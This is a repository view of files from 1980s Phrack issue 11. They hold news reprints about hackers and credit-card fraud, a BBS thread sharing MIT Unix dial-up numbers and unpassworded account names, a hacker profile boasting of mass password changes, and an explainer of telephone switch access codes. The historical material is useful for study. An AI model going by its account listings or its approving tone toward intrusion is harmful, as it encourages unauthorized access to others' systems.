and make a final attempt at making life worthy. It will be a short attempt,
and I do suspect that if it works out that none of my current friends will
know me then. If it doesn't work out, the news of my death will probably get
around. (I won't try to hide it.)"
Landreth's birthday is December 26 and his best friend is not counting on
seeing him again.
"We used to joke about what you could learn about life, especially since if
you don't believe in a God, then there's not much point to life," said Tom
Anderson, 16, a senior at San Pasqual High School in Escondido, about 30 miles
north of San Diego. Anderson also has been convicted of computer hacking and
placed on probation.
Anderson was the last person to see Landreth. It was around September 25 --
he does not remember exactly. Landreth had spent a week living in Anderson's
home so the two could share Landreth's computer. Anderson's IBM-PC had been
confiscated by authorities, and he wanted to complete his own book.
Anderson said he and Landreth were also working on a proposal for a movie
about their exploits.
"He started to write the proposal for it on the computer, and I went to take a
shower," Anderson said. "When I came out, he was gone. The proposal was in
mid-sentence. And I haven't seen him since."
Apparently Landreth took only his house key, a passport, and the clothes on
his back.
Anderson said he initially was not concerned about Landreth's absence. After
all this was the same Landreth who, during the summer, took off for Mexico
without telling anyone -- including friends he had seen just the night before
-- of his departure.
But concern grew by October 1, when Landreth failed to keep a speaking
engagement with a group of auditors in Ohio, for which he would have received
$1,000 plus expenses. Landreth may have kept a messy room and poor financial
records, but he was reliable enough to keep a speaking engagement, said his
friends and literary agent, Bill Gladstone, noting that Landreth's second
manuscript was due in August and had not yet been delivered.
But, the manuscript never came and Landreth has not reappeared.
Steve Burnap, another close friend, said that during the summer Landreth had
grown lackadaisical toward life. "He just didn't seem to care much about
anything anymore."
Typed for PWN by Druidic Death
From The Dallas Times Herald
______________________________________________________________________________
Beware The Hacker Tracker December, 1986
-------------------------
By Lamont Wood of Texas Computer Market Magazines
If you want to live like a spy in your own country, you don't have to join the
CIA or the M15 or the KGB. You can track hackers, like John Maxfield of
Detroit.
Maxfield is a computer security consultant running a business called
BoardScan, which tracks hackers for business clients. He gets occasional
death threats and taunting calls from his prey, among whom he is known as the
"hacker tracker," and answers the phone warily.
And although he has received no personal harassment, William Tener, head of
data security for the information services division of TRW, Inc., has found it
necessary to call in experts in artificial intelligence from the aerospace
industry in an effort to protect his company's computer files. TRW is a juicy
target for hackers because the firm stores personal credit information on
about 130 million Americans and 11 million businesses -- data many people
would love to get hold of.
Maxfield estimates that the hacker problem has increased by a factor of 10 in
the last four years, and now seems to be doubling every year. "Nearly every
system can be penetrated by a 14-year old with $200 worth of equipment," he
complains. "I have found kids as young as nine years old involved in hacking.
If such young children can do it, think of what an adult can do."
Tener estimates that there are as many as 5,000 private computer bulletin
boards in the country, and that as many as 2,000 are hacker boards. The rest
are as for uses as varied as club news, customer relations, or just as a hobby.
Of the 2,000 about two dozen are used by "elite" hackers, and some have
security features as good as anything used by the pentagon, says Maxfield.
The number of hackers themselves defies estimation, if only because the users
of the boards overlap. They also pass along information from board to board.
Maxfield says he has seen access codes posted on an east coast bulletin board
that appeared on a west coast board less than an hour later, having passed
through about ten boards in the meantime. And within hours of the posting of
a new number anywhere, hundreds of hackers will try it.
"Nowadays, every twerp with a Commodore 64 and a modem can do it, all for the
ego trip of being the nexus for forbidden knowledge," sighs a man in New York
City, known either as "Richard Cheshire" or "Chesire Catalyst" -- neither is
his real name. Cheshire was one of the earliest computer hackers, from the
days when the Telex network was the main target, and was the editor of TAP, a
newsletter for hackers and phone "phreaks". Oddly enough, TAP itself was an
early victim of the hacker upsurge. "The hacker kids had their bulletin
boards and didn't need TAP -- we were technologically obsolete," he recalls.
So who are these hackers and what are they doing? Tener says most of the ones
he has encountered have been 14 to 18 year old boys, with good computer
systems, often bright, middle class, and good students. They often have a
reputation for being loners, if only because they spend hours by themselves at
a terminal, but he's found out-going hacker athletes.
But Maxfield is disturbed by the sight of more adults and criminals getting
involved. Most of what the hackers do involves "theft of services" -- free
access to Compuserve, The Source, or other on-line services or corporate
systems. But, increasingly, the hackers are getting more and more into credit
card fraud.
Maxfield and Cheshire describe the same process -- the hackers go through
trash bins outside businesses whose computer they want to break into looking
for manuals or anything that might have access codes on it. They may find it,
but they also often find carbon copies of credit card sales slips, from which
they can read credit card numbers. They use these numbers to order
merchandise -- usually computer hardware -- over the phone and have it
delivered to an empty house in their neighborhood, or to a house where nobody
is home during the day. Then all they have to do is be there when the delivery
truck arrives.
"We've only been seeing this in the last year," Maxfield complains. "But now
we find adults running gangs of kids who steal card numbers for them. The
adults resell the merchandise and give the kids a percentage of the money."
It's best to steal the card number of someone rich and famous, but since
that's usually not possible it's a good idea to be able to check the victim's
credit, because the merchant will check before approving a large credit card
sale. And that's what makes TRW such a big target -- TRW has the credit
files. And the files often contain the number of any other credit cards the
victim owns, Maxfield notes.
The parents of the hackers, meanwhile, usually have no idea what their boy is
up to -- he's in his room playing, so what could be wrong? Tener recalls a
case where the parents complained to the boy about the high phone bill one
month. And the next month the bill was back to normal. And so the parents
were happy. But the boy had been billing the calls to a stolen telephone
company credit card.
"When it happens the boy is caught and taken to jail, you usually see that the
parents are disgruntled at the authorities -- they still think that Johnny was
just playing in his bedroom. Until, of course, they see the cost of Johnny's
play time, which can run $50,000 to $100,000. But outside the cost, I have
never yet seen a parent who was really concerned that somebody's privacy has
been invaded -- they just think Johnny's really smart," Tener says.
TRW will usually move against hackers when they see a TRW file or access
information on a bulletin board. Tener says they usually demand payment for
their investigation costs, which average about $15,000.
Tales of the damage hackers have caused often get exaggerated. Tener tells of
highly publicized cases of hackers who, when caught, bragged about breaking
into TRW, when no break-ins had occurred. But Maxfield tells of two 14-year
old hackers who were both breaking into and using the same corporate system.
They had an argument and set out to erase each other's files, and in the
process erased other files that cost about a million dollars to replace.
Being juveniles, they got off free.
After being caught, Tener says most hackers find some other hobby. Some,
after turning 18, are hired by the firms they previously raided. Tener says
it rare to see repeat offenders, but Maxfield tells of one 14-year-old repeat
offender who was first caught at age 13.
Maxfield and Tener both make efforts to follow the bulletin boards, and
Maxfield even has a network of double agents and spies within the hacker
community. Tener uses artificial intelligence software to examine the day's
traffic to look for suspicious patterns. TRW gets about 40,000 inquiries an
hour and has about 25,000 subscribers. But that does not address the
underlying problem.
"The real problem is that these systems are not well protected, and some can't
be protected at all," Maxfield says.
Cheshire agrees. "A lot of companies have no idea what these kids can do to
them," he says. "If they would make access even a little difficult the kids
will go on to some other system." As for what else can be done, he notes that
at MIT the first thing computer students are taught is how to crash the
system. Consequently, nobody bothers to do it.
But the thing that annoys old-timer Cheshire (and Maxfield as well) is that
the whole hacker-intruder-vandal-thief phenomenon goes against the ideology of
the original hackers, who wanted to explore systems, not vandalize them.
Cheshire defines the original "hacker ethic" as the belief that information is
a value-free resource that should be shared. In practice, it means users
should add items to files, not destroy them, or add features to programs,
rather than pirate them.
"These kids want to make a name for themselves, and they think that they need
to do something dirty to do that. But they do it just as well by doing
something clever, such as leaving a software bug report on a system," he
notes.
Meanwhile, Maxfield says we are probably stuck with the problem at least until
the phone systems converts to digital technology, which should strip hackers
of anonymity by making their calls easy to trace.
Until someone figures out how to hack digital phone networks, of course. -TCM
Typed for PWN by Druidic Death
______________________________________________________________________________

463
phrack11/12.txt Normal file
View file

@ -0,0 +1,463 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #12 of 12
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN *>=-{ Phrack World News }-=<* PWN
PWN PWN
PWN Issue XI PWN
PWN PWN
PWN Written, Compiled, and Edited PWN
PWN by Knight Lightning PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
Computer Bulletin Boards January 8, 1986
------------------------
By The KTVI Channel 2 News Staff in St. Louis
Please keep in mind that Karen and Russ are anchor persons at KTVI.
All comments in []s are by me.-KL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Karen: If Santa Claus brought you a computer for Christmas, beware of seeing
a few things you may not have bargained for. Computer bulletin boards
have spread by the thousands over the past few years and now some
people are concerned that the electronic messages may have gotten a
bit out of hand.
Russ: In its simplest definition, a computer bulletin board is a program or
message that can be accessed by other computers via telephone lines.
Anyone who has a home computer and a modem can receive and transmit to
computer bulletin boards. There are thousands of them nationwide, but
some are causing quite a stink [What a profound statement Russ].
[Flash to a picture of a geeky looking teenager]
Meet Jason Rebbe, he is a 16 year old computer whiz who a few months
ago accidentally tapped into a bulletin board called Dr. Doom's Castle.
[Sorry to break in here Russ, but why is this guy a computer whiz?
Just because he has a computer? Hey Russ, look a little closer, isn't
Jason sitting in front of a Commodore-64? I thought so. Oh yeah one
other thing, this BBS Dr. Doom's Castle has no known relation to Dr.
Doom (512) or Danger Zone Private.] Dr. Doom gives instructions on how
to build bombs and guns [Lions and Tigers and Bears, oh my!]. Jason
found the recipe for smoke bombs and tried to make one in his kitchen,
it didn't work. [Ba ha ha].
Jason: I heard an explosion in the basement first and that's when I knew
something was wrong. I thought it would be really neat to just set it
off someday when there was a lot of people around, just as a joke or a
prank. [Yeah, that would be K-Rad d00d!]. I didn't expect it to blow
up my house.
Russ: Jason wasn't hurt, but it cost about 2 grand [that's $2,000 to you and
me] to repair the kitchen. Jason's dad didn't take it well.
Bob Holloway: Mad wasn't the word for it. I, I was, I was past mad.
Russ: Mr. Holloway called Southwestern Bell and AT&T to see what could be
done about bulletin boards like Dr. Doom's Castle. The answer was
nothing. The Bureau of Alcohol, Tobacco, and Firearms said the same
thing.
Daniel Hoggart (Bureau of Alcohol, Tobacco, and Firearms): There is no
violation in publishing the information. The violation only
occurs when someone actually follows through on the
instructions and actually constructs a bomb.
Russ: Another bulletin board that is becoming more and more prevalent these
days is the Aryian Nation. This one [bulletin board] in Chicago says,
"If you are an anti-Communist you have made the right connection...on
the other hand, if you are consumed with such myths as
Judeo-Christianity, you most definitely dialed the wrong number."
Stan Anderman (Anti-Defamation League): Some of this really extreme hatred
is an attempt to create an environment where violence becomes
acceptable.
Russ: Like most computer bulletin boards the Aryian Nation message is legal
and falls under free speech laws. However, a bill is scheduled to go
to congress this session outlawing the kinds of bulletin boards we saw
here tonight.
But, for the moment, hackers should not be too surprised if something
unusual pops up on their computer terminal. [Ahem, Russ, you did it
again. All computer users are *NOT* hackers.]
Typed For PWN's Usage by Knight Lightning
______________________________________________________________________________
MIT Unix: Victim or Aggressor? January 23 - February 2, 1987
-------------------------------
Is the MIT system an innocent victim of hacker oppression or simply another
trap to capture unsuspecting hackers in the act?
It all started like this...
[Some posts have been slightly edited to be relevant to the topic]
------------------------------------------------------------------------------
MIT
Name: Druidic Death
Date: 12:49 am Mon Jan 20, 1986
Lately I've been messing around on MIT's VAX in there Physics Department.
Recently some one else got on there and did some damage to files. However MIT
told me that they'll still trust us to call them. The number is:
617-253-XXXX
We have to agree to the following or we will be kicked off, they will create a
"hacker" account for us.
<1> Use only GUEST, RODNEY, and GAMES. No other accounts until the
hacker one is made. There are no passwords on these accounts.
<2> Make sure we log off properly. Control-D. This is a UNIX system.
<3> Not to call between 9 AM and 5 PM Eastern Standard Time. This
is to avoid tying up the system.
<4> Leave mail to GEORGE only with UNIX questions (or C). And leave our
handles so he'll know who we are.
------------------------------------------------------------------------------
Unix
Name: Celtic Phrost
Date: 4:16 pm Mon Jan 20, 1986
Thanks Death for the MIT computer, I've been working on getting into them for
weeks. Here's another you can play around with:
617/258-XXXX
login:GUEST
Or use a WHO command at the logon to see other accounts, it has been a long
time since I played with that system, so I am unsure if the GUEST account
still works, but if you use the WHO command you should see the GUEST account
needed for applying for your own account.
-Phrost
------------------------------------------------------------------------------
Unix
Name: Celtic Phrost
Date: 5:35 pm Mon Jan 20, 1986
Ok, sorry, but I just remembered the application account, its: OPEN
Gawd, I am glad I got that off my chest!
-(A relieved)Celtic Phrost.
Also on that MIT computer Death listed, some other default accounts are:
LONG MIKE GREG NEIL DAN
Get the rest yourself, and please people, LEAVE THEM UNPASSWORDED!
------------------------------------------------------------------------------
MIT
Name: Druidic Death #12
Date: 1:16 am Fri Jan 23, 1987
MIT is pretty cool. If you haven't called yet, try it out. Just PLEASE make
sure you follow the little rules they asked us about! If someone doesn't do
something right the sysop leaves the gripe mail to me. Check out my directory
under the guest account just type "cd Dru". Read the first file.
------------------------------------------------------------------------------
MIT
Name: Ctrl C
Date: 12:56 pm Sat Jan 24, 1987
MIT Un-Passworded Unix Accounts: 617-253-XXXX
ALEX BILL GAMES DAVE GUEST DAN GREG MIKE LONG NEIL TOM TED
BRIAN RODNEY VRET GENTILE ROCKY SPIKE KEVIN KRIS TIM
And PLEASE don't change the Passwords....
-=>Ctrl C<=-
------------------------------------------------------------------------------
MIT Again
Name: Druidic Death
Date: 1:00 pm Wed Jan 28, 1987
Ok people, MIT is pissed, someone hasn't been keeping the bargain and they
aren't too thrilled about it. There were only three things they asked us to
do, and they were reasonable too. All they wanted was for us to not
compromise the security much more than we had already, logoff properly, not
leave any processes going, and call only during non-business hours, and we
would be able to use the GUEST accounts as much as we like.
Someone got real nice and added themselves to the "daemon" group which is
superusers only, the name was "celtic". Gee, I wonder who that could have
been? I'm not pissed at anyone, but I'd like to keep on using MIT's
computers, and they'd love for us to be on, but they're getting paranoid.
Whoever is calling besides me, be cool ok? They even gave me a voice phone to
chat with their sysops with. How often do you see this happen?
a little perturbed but not pissed...
DRU'
------------------------------------------------------------------------------
Tsk, Celtic.
Name: Evil Jay
Date: 9:39 am Thu Jan 29, 1987
Well, personally I don't know why anyone would want to be a superuser on the
system in question. Once you've been on once, there is really nothing that
interesting to look at...but anyway.
-EJ
------------------------------------------------------------------------------
In trouble again...
Name: Celtic Phrost
Date: 2:35 pm Fri Jan 30, 1987
...I was framed!! I did not add myself to any "daemon" group on any MIT UNIX.
I did call once, and I must admit I did hang up without logging off, but this
was due to a faulty program that would NOT allow me to break out of it, no
matter what I tried. I am sure that I didn't cause any damage by that.
-Phrost
------------------------------------------------------------------------------
Major Problems
Name: Druidic Death
Date: 12:20 pm Sat Jan 31, 1987
OK, major stuff going down. Some unidentified individual logged into the
Physics Dept's PDP11/34 at 617-253-XXXX and was drastically violating the
"agreement" we had reached. I was the one that made the "deal" with them.
And they even gave me a voice line to talk to them with.
Well, one day I called the other Physics computer, the office AT and
discovered that someone created an account in the superuser DAEMON group
called "celtic". Well, I was contacted by Brian through a chat and he told me
to call him. Then he proceeded to nicely inform me that "due to unauthorized
abuse of the system, the deal is off".
He was cool about it and said he wished he didn't have to do that. Then I
called George, the guy that made the deal and he said that someone who said he
was "Celtic Phrost" went on to the system and deleted nearly a year's worth of
artificial intelligence data from the nuclear fission research base.
Needless to say I was shocked. I said that he can't believe that it was one
of us, that as far as I knew everyone was keeping the deal. Then he (quite
pissed off) said that he wanted all of our names so he can report us to the
FBI. He called us fags, and all sorts of stuff, he was VERY!! [underline
twice] PISSED! I don't blame him. Actually I'm not blaming Celtic Phrost, it
very easily could have been a frame up.
But another thing is George thinks that Celtic Phrost and Druidic Death are
one and the same, in other words, he thinks that *I* stabbed him in the back.
Basically he just doesn't understand the way the hacker community operates.
Well, the deal is off, they plan to prosecute whoever they can catch. Since
George is my best friend's brother I have not only lost a friend, but I'm
likely to see some legal problems soon. Also, I can forget about doing my
graduate work at MIT. Whoever did this damage to them, I hope you're happy.
You really messed things up real nice for a lot of people.
Celtic, I don't have any reason to believe you messed with them. I also have
no reason to think you didn't. I'm not making an accusation against you, but
WHOEVER did this, deserves to be shot as far as I'm concerned. Until this
data was lost, they were on the verge of harnessing a laser-lithium produced
form of nuclear fission that would have been more efficient than using the
standard hydrogen. Well, back to the drawing board now.
I realize that it's hard to believe that they would have data like this on
this system. But they were quite stupid in many other areas too. Leaving the
superuser account with no password?? Think about it.
It's also possible that they were exaggerating. But regardless, damage seems
to have been done.
------------------------------------------------------------------------------
MIT
Name: Phreakenstein
Date: 1:31 am Sun Feb 01, 1987
Heck! I dunno, but whoever it was, I think, should let himself (the s00per
K-rad elyte d00d he is) be known.
I wasn't on MIT, but it was pretty dumb of MIT to even let Hackers on. I
wouldn't really worry though, they did let you on, and all you have to prove
is that you had no reason to do it.
----Phreak
------------------------------------------------------------------------------
I wonder...
Name: Ax Murderer #15
Date: 6:43 pm Sun Feb 01, 1987
I highly doubt that is was someone on this system. Since this is an elite
board, I think all the users are pretty decent and know right and wrong things
to do. Could be that one of the users on this system called another system
and gave it out!?? Nahh...shooting the asshole is not enough, let's think of
something better.
Ax Murderer
------------------------------------------------------------------------------
It was stupid
Name: Druidic Death #12
Date: 9:21 pm Sun Feb 01, 1987
It seems to me, or, what I gathered, they felt that there were going to be
hackers on the system to begin with and that this way they could keep
themselves basically safe.
I doubt that it was Celtic Phrost, I don't think he'd be an asshole like that.
But I can't say. When I posted, I was pretty pissed about the whole deal.
I've calmed down now. Psychic Warlord said something to me voice the other
day that made me stop and think. What if this was a set up right from the
start? I mean, MIT won't give me specifics on just what supposedly happened,
Celtic Phrost denies everything, and the biggest part of it is what George
said to me.
"We can forgive you for what you did to us if you'll promise to go straight
and never do this again and just tell us who all of your friends are that are
on the system".
I didn't pay much attention to that remark at first, now I'm beginning to
wonder...
I, of course, didn't narc on anyone. (Who do I know??? hehe)
DRU'
------------------------------------------------------------------------------
Well
Name: Solid State
Date: 11:40 pm Sun Feb 01, 1987
Well if they were serious about the FBI, I wouldn't take this too lightly.
Lately at Stanford there has been a lot of investigators that I've pinpointed
running around. This is mainly due to the number of break-ins this summer.
Anyways, if a large college like MIT says they may call in the FBI, be wary,
but don't over-react.
SOLID STATE
------------------------------------------------------------------------------
Comments...
Name: Delta-Master
Date: 7:15 am Mon Feb 02, 1987
It wouldn't surprise me if it was some kind of setup, it's been done before.
Delta-Master
------------------------------------------------------------------------------
Oh well...
Name: Evil Jay
Date: 8:56 am Mon Feb 02, 1987
I think your all wrong. The MIT lines have been around for a long time and
are widely known among the rodents. Anyone with a g-file could hack out a
password on the system so it looks to me like someone just messed around and
just happened to use Phrost as a flunkie. Oh well...
-EJ
------------------------------------------------------------------------------
All posts taken from:
___
/ )
\___ | | __
\ |_ _ _| _ (_ _ _ _
(___/ | ) ( \ ( | (_) \/\/ __) | ) ( \ \/\/ | )
|
\_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_/
"We're not ELITE... we're just cool as hell."
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Information Provided indirectly/directly by
Ax Murderer/Celtic Phrost/Ctrl C/Delta-Master/Druidic Death
Evil Jay/Phreakenstein/Solid State
______________________________________________________________________________
Phortune 500: Phreakdom's Newest Organization February 16, 1987
----------------------------------------------
For those of you who are in the least bit interested, Phortune 500 is a group
of telecommunication hobbyists who's goal is to spread information as well as
further their own knowledge in the world of telecommunications. This new
group was formed by:
Brew Associates/Handsomest One/Lord Lawless/The Renegade Chemist
Quinton J. Miranda/Striker/The Mad Hacker/The Spiker
These eight members are also known as Board Of Directors (BOD). They don't
claim to be *Elite* in the sense that they are they world's greatest hackers,
but they ARE somewhat picky about their members. They prefer someone who
knows a bit about everything and has talents exclusive to him/herself.
One of the projects that Phortune 500 has completed is an individual password
AE type system. It's called TransPhor. It was written and created by Brew
Associates. It has been Beta tested on The Undergraduate Lounge (Sysoped by
Quinton J. Miranda). It is due to be released to the public throughout the
next few months.
Phortune 500 has been in operation for about 4 months, and has released two
newsletters of their own. The Phortune 500 Newsletter is quite like the
"People" of contemporary magazines. While some magazines cover the deep
technical aspects of the world in which we communicate, their newsletter tries
to cover the lighter side while throwing in information that they feel is "of
technical nature." The third issue is due to be released by the end of this
month.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
*>=-> The Phortune 500 Membership Questionnaire <-=<*
Note: The following information is of a totally confidential nature. The
reason you may find this so lengthy and in depth is for our knowledge
of you. We, with Phortune 500, feel as though we should know
prospective members well before we allow them into our organization.
Pending the answers you supply us, you will be admitted to Phortune 500
as a charter member. Please answer the following completely...
..............................................................................
Handle :
First Name :
Voice Phone Number :
Data Phone Number :
City & State :
Age :
Occupation (If Applicable) :
Place of Employment (Optional) :
Work Phone Number (Optional) :
Computer Type :
Modem Type :
Interests :
Areas Of Expertise :
References (No More Than Three) :
Major Accomplishments (If Any) :
..............................................................................
Answer In 50 Words Or Less;
^*^ What Is Phortune 500 in Your Opinion?
^*^ Why Do You Want To Be Involved With Phortune 500?
^*^ How Can You Contribute to Phortune 500?
..............................................................................
Please answer each question to the best of your ability and then return to any
Phortune 500 Board of Directors Member Or a Phortune 500 BBS:
The Private Connection (Limited Membership) 219-322-7266
The Undergraduate AE (Private Files Only) 602-990-1573
Information provided by
Quinton J. Miranda & Phortune 500 Board Of Directors
______________________________________________________________________________
PWN Quicknote
-------------
At the University of Rhode Island there is supposed to be some undercover
agent for Bay Bell. Supposedly he hangs out at the library and watches for
people checking out the Bell Technical Journals. Then he asks questions like,
'What do you want those for?' 'Do you know what 2600Hz is?' and other similar
questions. He isn't registered at the school and of course has no classes.
[Sounds bogus to me...oh well-KL]. Information by Asmodeus Rex (1/21/87)
______________________________________________________________________________

135
phrack11/2.txt Normal file
View file

@ -0,0 +1,135 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #2 of 12
==Phrack Pro-Phile VIII==
Written and Created by Taran King
2/17/87
Welcome to Phrack Pro-Phile VIII. Phrack Pro-Phile is created to
bring info to you, the users, about old or highly important/controversial
people. This month, I bring to you one of the older and high profile phreaks
of the past...
Wizard of Arpanet
~~~~~~~~~~~~~~~~~
Wizard of Arpanet is one of the older of the phreak/hack generation.
His main accomplishments include running Inner Circle and Secret Service BBS.
Handle: Wizard of Arpanet
Call him: Eric
Past handles: The Hacker and The Priest
Handle Origin: A real programmer on Arpanet was called The
Wizard and Eric took his handle from him.
Date of Birth: 02/26/69
Age in 9 days of this writing: 18 years old
Height: 6'1"
Weight: 150 lbs
Eye color: Blue
Hair color: Dishwaterish blond
Computers: Atari 400, Commodore 64
Sysop/Co-sysop of: Secret Service
------------------------------------------------------------------------------
Wizard of Arpanet started as your average BBS caller. He eventually
called Central Processing Unit (a local board to him), and there were these
funny numbers on the board. He called and tried to connect with his modem,
but they turned out to be Sprint dial-ups. The CPU Sysop informed him of what
to do and he started calling national BBSs. Boards that helped him to advance
include the Twilight Zone (the sysop was the guy that wrote T-Net), OSUNY,
Dragon's Lair, and Delta BBS. Wizard organized various groups which included
(from earliest to most recent): PHA (Phreakers and Hackers of America) -
(included Deep Throat, Phreak King, and Psycho Killer), The Inner Circle (1st
one) (included Shockwave Rider, and Satan Knight aka Redrum), and The 2nd
Inner Circle (included The Cracker, Mr. America, Napoleon Bonapart, Stainless
Steal Rat, Big Brother, Mr. Xerox, Bootleg, Maxwell Wilke, Mandrake The
Magician, and Zaphod Beeblebrox).
Eric got the number to Arpanet from Dark Dante, and got on the MIT
Research System from looking through TAC News. One night he got like 50-60
accounts on the Unix and changed all of the passwords to WIZARD.
Stainless Steal Rat, the Sysop of Delta BBS, and The Myth were all up
from NJ one weekend, and they were staying the weekend at John Maxfield's
house. They went to John's office. Wizard asked Maxfield if he could use his
computer to print out some things he had with him and he printed out some
stuff from the Stanford Artificial Intelligence address list for Arpanet.
John was amazed. "Wow," he said, "I have prime evidence on you." (TK: This
may not for sure be an exact quote). He then proceeded to bust our friend,
Eric, the next week. He also had a lot of stuff from AUTOVON from some fellow
in Washington and started playing with the FTS lines (Federal Telephone
System) which he found from, none other than, John Maxfield. They had found
the default passwords for TeleMail too, and got the administrator accounts and
set up their own BBS on Nassau and Coca-Cola systems plus anywhere else
possible. And all of a sudden, it all came down when Mandrake decided to
crash parts of TeleMail. Enter, Federal Bureau of Investigations. They had
been monitoring Eric for 6 months looking for some evidence to get him on.
And thus, they got it. Nothing really happened, but he had to get a lawyer
and he got some publicity in the paper. After 90 days, everything they had
taken, with the exception of a few documents, was sent back. During those 90
days, Eric worked as a computer security consultant at a bank making $200 an
hour (2 hours...).
The only "phreaks" he's met are Stainless Steal Rat and Cable Pair.
Eric has been mentioned on local TV/News, in newspapers, USA Today,
NY Times, Washington Post, Books, and Britannica Encyclopedia (look under
Hacker).
------------------------------------------------------------------------------
Interests: Music (preferably jazz, reggae, new wave), Eastern
philosophy (Zen Buddhism), reading Jack Kerouac books (a
great beatnik writer), driving aimlessly, slowly becoming
a social recluse, physics, and Greek mathematicians.
Eric's Favorite Things
----------------------
Women: The pursuit thereof (Karen Wilder).
Foods: Chinese.
Cars: BMW 320-I.
Artist: Salvador Dali.
Plans for next few months: Next year and a half - travelling to Montreal in
April for a week of leisure, then jetting back to
beautiful Detroit and continuing his studies at
Eisenhower High School.
Most Memorable Experiences
--------------------------
Realizing all at once that everything you did 3 years ago was stupid.
Growing into a new person.
Gaining morals and new ideas and a new outlook.
Some People to Mention
----------------------
Tuc (For telling him about boxing).
Tom Tone (For calling him on his first conference).
Magnetic Surfer (Talking to him for the first time after Sherwood Forest went
down voice).
John Maxfield (Meeting him).
Stainless Steal Rat (Meeting him...with John Maxfield).
Dark Dante (One of the legends phreakdom).
------------------------------------------------------------------------------
Always follow your instinct and not your desire for you will be
sorry because you will be lying to yourself.
------------------------------------------------------------------------------
I hope you enjoyed this file. Look forward to more Phrack Pro-Philes coming
in the near future. ...And now for the regularly taken poll from all
interviewees.
Of the general population of phreaks you have met, would you consider most
phreaks, if any, to be computer geeks? No, says Eric, he considers them a new
breed of intellect. Thanks for your time, Eric.
Taran King
Sysop of Metal Shop Private

158
phrack11/3.txt Normal file
View file

@ -0,0 +1,158 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #3 of 12
.___. .___.
|___| |___|
| |
/^\ /^\
[+]PLP[+]------------------------------------------[+]PLP[+]
\^/ ^ ^ \^/
|S| P ^[+]The Executioner[+]^ P |S|
|e| PLP ^[+]PhoneLine Phantoms![+]^ PLP |e|
|x| P _____[+]The Network Technicians[+]______ P |x|
|y| ^ ------------------------ ^ |y|
|-| [+] PACT: Prefix Access Code Translator [+] |-|
|T| ^ ==================================== ^ |T|
|N| [+]Written for PHRACK Inc. Issue Eleven.[+] |N|
|T| |T|
|-|_______. Call Phreak Klass, Room 2600 ._______|-|
|PHRACK XI| [806][799][0016] Login:EDUCATE |PHRACK XI|
--------| |________________________________| |--------
|____________________________________|
The PACT (Prefix Access Code Translator) feature provides preliminary
translation data for features using access codes that are prefixed by a
special code. A standard numbering and dialing plan requires that individual
line and small business customers' (custom) calling use prefixed access code
dialing for feature access. PACT is offered on a per office basis. The PACT
is NOT used for the interpretation of Centrex dialing customers.
When a call is originated by the customer, a call register is used to
store the data about the call. The customer dials a prefix and a 2 digit
access code (table a). The PACT then looks at the digits to determine what
action should take place. Reorder or special service error messages will be
heard if you enter an unassigned code. If the code is accepted, then that
particular action will be performed. The PACT consists of the PACT head table
and the prefixed access code translator. The PACT feature allows the dialing
of a special code for a prefix. These are the '*' and '#'. If you have rotary,
then '11' and '12' are used respectively. To use PACT, the prefix must be
followed by a 2-digit code. This combination is then defined in terms of type
and subtype (table b).
TABLE A
____________________________________________________________
| Access Code | Description of function |
|________________________|_________________________________|
| *2X - *3X (x= 0-9) | Growth to 2 or 3 digit codes |
| | (Future may call for these) |
| | |
| *4X - *5X - *7X | Local Area Signalling Services |
| | |
| *72 | Call Forwarding Activation |
| | |
| *73 | Call Forwarding Deactivation |
| | |
| *74 | 1-digit speed dialing |
| | |
| *75 | 2-digit speed dialing |
| | |
| #56 | Circuit Switched Digital |
| | Capability |
|________________________|_________________________________|
The subtranslator is always built 100 words long. A word is a binary code
which, when sent as a whole, act as a command. One word is equal to a 2-digit
access code. This subtranslator contains the PTW (Primary Translation Word).
The PTW contains the feature type subtype and feature subtype index to
determine the function of the dialed code. The feature subtype allows four
subtype tables to exist for feature type 31 (LASS). Index 0 is for LASS. Index
1 is used for LASS on a pay per usage basis. Index 2 and 3 are currently not
used.
TABLE B (written in report form)
================================
Feature Type: 0 (Unassigned)
Feature Type: 1 (1-digit abbr. dialing)
Subtypes: 0 (Speed Call)
1 (Change the Speed Call List)
2 (Invalid)
Feature Type: 2 (2-digit dialing.)
Subtypes: (Same as Feature 1)
Feature Type: 3 (Circuit Switch Digital Capability)
Subtype: 1 (CSDC 56 kilo bit service)
Feature Type: 4 (Usage Sensitive 3-way)
Feature Type: 5 (Cancel Call Waiting)
Feature Type: 20 (Call Forwarding Activate)
Feature Type: 21 (Call Forwarding deactivate)
Feature Type: 22 (Project Acct. Service (Autoplex))
Feature Type: 26 (Customer changeable Inter LATA carrier)
Feature Type: 27 (Voice/Data Protection)
Feature Type: 28 (MDS-Message Desk Service)
Subtypes: 0 (MDS activation)
1 (MDS deactivation)
Feature Type: 30 (Residence Data Facility Pooling)
Feature Type: 31 (Local Area Signalling Services-LASS)
[index 0]
Subtypes: 0 (AR-Automatic Recall {Incoming Calls})
1 (AR-Outgoing calls)
2 (AR activation incoming/outgoing)
3 (AR deactivation)
4 (Customer Originated Trace Activation)
5 (Distinctive Alert Activation)
6 (ICLID activation)
7 (Selective Call Rejection Activation)
8 (Selective Call Forwarding activation)
9 (Private Call Activation)
10 (Distinctive Alert -OFF)
11 (ICLID-OFF)
12 (SCR-OFF)
13 (SCF-OFF)
14 (Private Call-OFF)
15 (Distinctive Alert ON/OFF) toggle for opposite
16 ICLID toggle on/off
17 SCR toggle on/off
18 SCF toggle on/off
19 Private Call on/off
20 Selective Call Acceptance-ON
21 SCA OFF
22 SCA toggle on/off
23 (Computer Access Restriction) on
24 CAR off
25 CAR on/off
26-31 (reserved for future LASS functions)
Index 1 Pay Per View
subtype: 0 (Order placement)
1 (Order Cancel)
The PACT function is extremely important for LASS functions. PACT is what
lets you tell your switch what you want done. Without the PACT, communication
between you and your CO would not exist. PACT is the base foundation for the
use access codes.
============================================================
